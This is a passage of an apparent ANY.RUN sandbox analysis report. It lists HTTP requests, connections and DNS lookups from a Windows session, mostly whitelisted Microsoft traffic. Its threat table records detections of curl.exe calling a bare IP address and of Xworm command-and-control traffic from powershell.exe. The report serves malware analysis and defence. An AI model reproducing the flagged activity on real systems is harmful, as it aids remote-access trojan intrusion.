http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7120
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6152
svchost.exe
HEAD
200
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/fb6dd03b-99d7-4cc8-a878-91c8e655c2d3?P1=1739806664&P2=404&P3=2&P4=iZFeuZsrtT6Z7E%2bjIPyq9LOnM2MIcWwzV%2bgwVMzOQC7FvFNxEUHhBxFiQP8cgHGYY7NPvcI5lUqETG4f93jqkw%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.173:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5448
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
2.21.65.132:443
www.bing.com
Akamai International B.V.
NL
whitelisted
1176
svchost.exe
40.126.31.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
6984
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.46
whitelisted
crl.microsoft.com
  • 23.48.23.173
  • 23.48.23.141
  • 23.48.23.176
  • 23.48.23.164
  • 23.48.23.180
  • 23.48.23.177
  • 23.48.23.194
  • 23.48.23.145
  • 23.48.23.167
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 95.101.149.131
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
  • 2.21.65.153
whitelisted
login.live.com
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.129
  • 40.126.31.0
  • 20.190.159.68
  • 40.126.31.2
  • 20.190.159.129
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
www.wp.pl
  • 212.77.98.9
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted

Threats

PID
Process
Class
Message
7728
curl.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
4704
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
www.wp.pl